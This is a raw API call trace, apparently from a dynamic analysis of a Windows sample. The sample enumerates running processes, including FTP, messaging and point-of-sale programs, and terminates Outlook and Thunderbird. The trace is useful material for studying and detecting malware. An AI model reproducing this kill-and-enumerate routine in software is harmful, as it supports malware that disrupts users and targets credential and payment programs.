[0133.865] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x414, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="requiring.exe")) returned 1 [0133.866] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="server.exe")) returned 1 [0133.866] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fans-supported.exe")) returned 1 [0133.867] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="baghdad rpg.exe")) returned 1 [0133.867] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="briefly.exe")) returned 1 [0133.868] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="extends.exe")) returned 1 [0133.869] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="stuart.exe")) returned 1 [0133.869] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0133.870] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0133.870] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0133.871] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0133.872] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0133.872] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0133.873] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0133.873] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0133.874] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0133.875] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0133.875] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0133.876] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0133.876] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0133.877] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0133.878] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0133.878] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0133.879] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0133.880] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0133.881] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x830) returned 0x128 [0133.881] TerminateProcess (hProcess=0x128, uExitCode=0xffffffff) returned 1 [0133.883] CloseHandle (hObject=0x128) returned 1 [0133.884] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0133.885] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0133.886] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0133.887] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0133.888] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0133.889] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x880) returned 0x128 [0133.889] TerminateProcess (hProcess=0x128, uExitCode=0xffffffff) returned 1 [0133.890] CloseHandle (hObject=0x128) returned 1 [0133.890] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0133.891] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0133.892] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0133.893] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0133.894] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0133.895] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0133.896] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0133.897] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x900, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0133.898] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0133.899] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x920, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0133.900] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x930, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0133.901] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0133.902] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0133.902] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0133.903] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0133.904] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0133.905] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x990, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0133.906] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0133.907] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0133.908] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0133.909] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0133.910] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="perhaps goods systematic.exe")) returned 1 [0133.910] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="photoshop_wilderness.exe")) returned 1 [0133.911] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="secondarycop.exe")) returned 1 [0133.912] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reed avg.exe")) returned 1 [0133.913] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0133.914] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0133.915] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.915] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="zes.exe")) returned 1 [0133.916] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x634, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0133.917] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0133.918] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0133.919] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.919] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x948, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.920] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0133.921] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0133.922] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="wbengine.exe")) returned 1 [0133.922] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0133.923] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="vdsldr.exe")) returned 1 [0133.924] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vds.exe")) returned 1 [0133.924] Process32NextW (in: hSnapshot=0x12c, lppe=0x71fd04 | out: lppe=0x71fd04*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="vds.exe")) returned 0 [0133.925] CloseHandle (hObject=0x12c) returned 1 [0133.925] GetProcessHeap () returned 0x520000 [0133.925] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x546028 | out: hHeap=0x520000) returned 1 [0133.925] GetProcessHeap () returned 0x520000 [0133.925] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c350 | out: hHeap=0x520000) returned 1 [0133.925] GetProcessHeap () returned 0x520000 [0133.925] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443c8 | out: hHeap=0x520000) returned 1 [0133.925] GetProcessHeap () returned 0x520000 [0133.925] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c3c8 | out: hHeap=0x520000) returned 1 [0133.925] GetProcessHeap () returned 0x520000 [0133.925] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443d8 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c3a0 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443e8 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c378 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5443f8 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c3f0 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544408 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539e00 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544418 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539e20 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544428 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x539e40 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544438 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c418 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544448 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c440 | out: hHeap=0x520000) returned 1 [0133.926] GetProcessHeap () returned 0x520000 [0133.926] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544458 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x5435c8 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544468 | out: hHeap=0x520000) returned 1 [0133.927] GetProcessHeap () returned 0x520000 [0133.927] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x53c468 | out: hHeap=0x520000) returned 1 